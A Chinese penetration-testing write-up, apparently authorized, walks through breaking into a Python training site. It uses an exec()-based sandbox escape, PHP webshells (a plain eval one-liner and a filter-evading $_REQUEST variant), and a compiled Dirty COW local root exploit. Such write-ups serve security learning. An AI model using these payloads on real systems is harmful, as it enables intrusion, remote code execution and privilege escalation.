从外网绕过沙箱逃逸再到内网权限提升的一次常规渗透项目
The following article is from flower安全混子 Author Flowers aq
公众号现在只对常读和星标的公众号才展示大图推送,
建议大家把听风安全设为星标,否则可能就看不到啦!
----------------------------------------------------------------------
前言:
最近也临近假期了也是一直在忙着干其它事情好久没写实战文章了,今天这个项目是之前一位企业运营加了花某授权的一次私人项目写的也是这次测试过程中相对简单的一环
已经过甲方授权发表文章。
代码执行和提权:
由于甲方规定不可使用扫描工具所以信息收集部分也得手动搜集
首先切入甲方给予的主域名之一 “test1.cn”
底下版权区存在友链点击发现其它资产
友情链接处第一项为【业务扩展】点击此超链接
发现甲方企业下属的子公司是个教育培训公司,由于在【授权书】中有说明企业下属子公司也算有效测试所以就讲这一大资产也列举为了测试资产之一。
培训公司主域名打开后发现业务主要为python培训,随后开始继续收集站点功能点寻找和梳理突破口。
发现一个提示面板但是没用直接舍弃了
梳理完资产后发现存在【python大闯关】功能点,实际浏览进一步突破:
看描述是练习print的点击发现存在在线编辑:
这是结果区:
测试发现可以编辑并运行代码所以第一时间就想到了沙箱逃逸
响应包中发现是nginx搭建的,根据经验nginx在linux上是要常见些的,当时也有很多win系统也用nginx搭建网站,但是花某这块先是用linux命令结合payload进行了测试:
首先直接输入:
import os
os.system
提示非法import但是并没有给出是import语句非法还是import这个字符串非法所以进一步测试认证一下:
成功输出“import”所以是禁用了import语句而并非禁用了字符串,所以就有了操作空间这块直接构造payload试试:
command = 'import os\nos.system("id")'
exec(command)
这个payload是将 import os\nos.system("id")
作为一个字符串赋值给 command
变量,并使用 exec
函数执行了这个字符串中的代码。这样就能够实现和 os.system("id")
类似的效果,所以就绕过了import导入os的这一步操作从而绕过沙箱禁用import:
uid为501的普通用户,少见,但是还是回显了id命令的执行结果所以进一步利用,到了这一步通常就是写入py的shell了但是浏览功能点我发现了一个问题,py沙箱的的路径是
http://test1.user1.cn/pyuctu
然后再此路径下也是存在php文件的例如:
http://test1.user1.cn/search.php
就是个搜索栏所以写入php的shell应该也是能解析的,去构造payload试试:
command = 'import os\nos.system("echo "<?php @eval($_POST['cmd']); ?>" >> 1.php")'
exec(command)
蚁剑连接试试:
访问shell的位置:
http://test1.user1.cn/1.php
这块知道shell位置是因为此前还运行的ls确认的目录为根目录,沙箱也在根目录中所以shell位置就确定了,但是访问shell位置却回显不存在:
写入的shell不见了应该是被杀了,后续尝试了多个免杀的shell最终成功的是:
<?php
$a=$_REQUEST['x'];
$b="\n";
eval($b.=$a);
?>
根据shell就能知道应该是过滤了GET和POST了,shell管理工具连接。
用蚁剑再上个大马,因人而异花某只是感觉用蚁剑上传比较方便且传个冰蝎用冰蝎再进一步操作也很方便。
连接后查看基本信息看看:
CentOS 6.8系统2.6.32-642.15.1.el6.x86_64的内核,看到这个版本和内核直接脏牛提权试试:
https://github.com/FireFart/dirtycow/blob/master/dirty.c
下载exp,上传至目录
gcc -pthread /tmp/dirty.c -o /tmp/dirty -lcrypt
第一次编译失败后面发现是没下载gcc所以下载一下
yum install gcc
编译成功后下载运行exp
./dirty
再次查看id值:
成功。
总结:
这次的难度主要集中再沙箱逃逸中整体难度适中,后面的提权很奇怪对于
StackClash(CVE-2017-1000364)和SOCK_RAW(CVE-2016-8655)
都有打补丁但是对于较常见脏牛却没有。